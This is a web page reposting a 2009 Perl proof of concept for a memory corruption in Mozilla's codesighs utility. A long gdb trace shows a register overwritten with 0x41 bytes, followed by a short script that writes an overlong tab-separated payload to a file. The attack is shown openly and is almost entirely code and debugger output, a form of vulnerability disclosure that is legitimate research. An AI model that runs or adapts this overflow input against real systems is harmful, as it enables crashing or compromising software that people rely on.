首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Mozilla Codesighs Memory Corruption PoC
来源:jbrownsec.blogspot.com 作者:Brown 发布时间:2009-12-14  

#!/usr/bin/perl
# thedailyshow.pl
# AKA
# Mozilla Codesighs Memory Corruption PoC
#
# Jeremy Brown [0xjbrown41@gmail.com//jbrownsec.blogspot.com//krakowlabs.com] 12.12.2009
#
# *********************************************************************************************************
#
# 257     while(0 == retval && NULL != fgets(lineBuffer, sizeof(lineBuffer), inOptions->mInput))
# (gdb)
# 259         trimWhite(lineBuffer);
# (gdb)
# trimWhite (inString=0xbfffd310 "1\tCODE\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 15 times>, "\t", 'A' <repeats 145 times>...) at codesighs.c:213
# 213     int len = strlen(inString);
# (gdb)
# 215     while(len)
# (gdb)
# 217         len--;
# (gdb)
# 219         if(isspace(*(inString + len)))
# (gdb)
# 221             *(inString + len) = '\0';
# (gdb)
# 215     while(len)
# (gdb)
# 217         len--;
# (gdb)
# 219         if(isspace(*(inString + len)))
# (gdb)
# 228 }
# (gdb)
# codesighs (inOptions=0xbffff350) at codesighs.c:261
# 261         scanRes = sscanf(lineBuffer,
# (gdb) i r
# eax            0x0 0
# ecx            0xb7fe468c -1208072564
# edx            0x82 130
# ebx            0x9d8ff4 10326004
# esp            0xbfffd040 0xbfffd040
# ebp            0xbffff328 0xbffff328
# esi            0x0 0
# edi            0x0 0
# eip            0x8048945 0x8048945 <codesighs+142>
# eflags         0x246 [ PF ZF IF ]
# cs             0x73 115
# ss             0x7b 123
# ds             0x7b 123
# es             0x7b 123
# fs             0x0 0
# gs             0x33 51
# (gdb) s
# 270         if(6 == scanRes)
# (gdb) i r
# eax            0x6 6
# ecx            0x414141 4276545
# edx            0x0 0
# ebx            0x9d8ff4 10326004
# esp            0xbfffd040 0xbfffd040
# ebp            0xbffff328 0xbffff328
# esi            0x0 0
# edi            0x0 0
# eip            0x804899d 0x804899d <codesighs+230>
# eflags         0x282 [ SF IF ]
# cs             0x73 115
# ss             0x7b 123
# ds             0x7b 123
# es             0x7b 123
# fs             0x0 0
# gs             0x33 51
# (gdb)
#
# http://jbrownsec.blogspot.com/2009/12/mozilla-code-sighs.html
#
# "Can't read my, can't read my, no she can't read my poker face"
#
# *********************************************************************************************************
# thedailyshow.pl

$filename = $ARGV[0];

if(!defined($filename))
{

     print "Usage: $0 <filename>\n";
     exit;

}

$payload = "1\tCODE\t" . "A" x 15 . "\t" . "A" x 15 . "\t" . "A" x 15 . "\t" . "A" x 260 . "\t";

     open(FILE, ">", $filename) or die("\nError: Can't write to $filename");
     print FILE $payload;
     close(FILE);

     print "Wrote payload to \"$filename\"\n";
     exit;


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HP NNM 7.53 ovalarm.exe CGI Pr
·RM Downloader 3.0.2.1(.M3U Fil
·Savant Web Server 3.1 Remote B
·win xp sp2 PEB ISbeingdebugged
·Xenorate 2.50(.xpl) universal
·Xenorate 2.50(.xpl) universal
·Easy RM to MP3 Converter 2.7.3
·SAP GUI for Windows sapirrfc.d
·Adobe Multimeda Doc.media.newP
·Eureka Email 2.2q ERR Remote B
·Monkey HTTP Daemon < 0.9.3 Den
·Google Picasa 3.5 Local DoS Bu
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved